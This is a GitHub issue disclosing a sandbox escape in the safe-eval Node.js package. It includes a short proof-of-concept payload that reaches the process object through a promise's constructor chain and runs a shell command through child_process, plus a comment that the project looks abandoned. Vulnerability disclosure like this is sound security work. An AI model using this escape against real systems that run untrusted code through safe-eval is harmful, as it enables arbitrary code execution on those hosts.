New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Sandbox Escape #27

Open

rectcoordsystem opened this issue Dec 21, 2022 · 1 comment

rectcoordsystem commented Dec 21, 2022

We found sandbox escape vulnerability in the latest version of safe-eval (node v18.12.1)

POC :

const safe_eval = require('safe-eval')
code = `
import('test').catch((e)=>{})['constructor']['constructor']('return process')().mainModule.require('child_process').execSync('touch rce')
`
safe_eval(code)

Our payload is inspired by CVE-2021-23449 in vm2

The text was updated successfully, but these errors were encountered:

Lucienest commented Dec 31, 2022

this project looks like abandoned, no update since 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment